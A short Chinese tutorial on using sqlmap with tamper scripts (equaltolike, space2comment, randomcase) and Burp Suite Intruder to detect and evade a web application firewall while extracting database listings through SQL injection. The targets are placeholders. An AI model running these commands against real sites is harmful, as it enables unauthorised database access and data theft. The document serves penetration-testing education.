SQLmap绕过防火墙

确认WAF

sqlmap命令：

sqlmap -u 目标URL --threads=10 --identify-waf#首选
sqlmap -u 目标URL --threads=10 --check-waf#备选

使用burpsuite

抓包 --> 右击send to intruder --> 把id=x,x设为变量(选中x 点击右边add) --> payload --> load选择工具 --> 最上方intruder-->start --> 根据返回包可以看到过滤字符

1.PNG

绕过WAF(利用tamper脚本)

sqlmap.py -u www.xxx.com/xxx.php --dbs --batch --flush-session --tamper=脚本名
脚本名称之间使用英文逗号连接，脚本选择需要根据第一步得到的过滤字符

sqlmap.py -u www.xxx.com/xxx.php --dbs --batch --flush-session --tamper=equaltolike.py,space2comment.py,randomcase.py

--batch 从不询问用户输入 ，使用默认配置
--flush-session刷新当前目标会话文件
--tamper 脚本
equaltolike.py 用like代替=
space2comment.py 用注释代替空间字符
randomcase.py 随机大小写
tamper文件夹根目录：sqlmap\tamper

附，tamper脚本对照表：